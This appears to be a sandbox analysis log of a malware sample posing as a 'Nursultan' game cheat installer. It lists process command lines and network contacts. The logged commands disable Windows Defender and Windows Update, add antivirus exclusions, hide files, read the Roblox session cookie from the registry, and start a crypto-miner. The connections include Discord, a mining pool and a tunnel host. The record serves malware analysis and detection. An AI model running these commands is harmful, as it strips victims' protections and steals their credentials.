C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc.exe" qc windefend

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"

C:\Windows\SysWOW64\whoami.exe

"C:\Windows\system32\whoami.exe" /groups

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\SysWOW64\net1.exe

"C:\Windows\system32\net1.exe" start TrustedInstaller

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\net1.exe

"C:\Windows\system32\net1.exe" start lsass

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc.exe" qc windefend

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"

C:\Windows\SysWOW64\whoami.exe

"C:\Windows\system32\whoami.exe" /groups

C:\Windows\SysWOW64\net1.exe

"C:\Windows\system32\net1.exe" stop windefend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\SysWOW64\sc.exe

"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dd_SetupUtility.txt

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 30.178.252.5.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
N/A 127.0.0.1:28223 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 unknown-sunglasses.gl.at.ply.gg udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 20.221.185.147.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
N/A 127.0.0.1:28223 tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
N/A 127.0.0.1:28223 tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
N/A 127.0.0.1:28223 tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.180.3:443 gstatic.com tcp
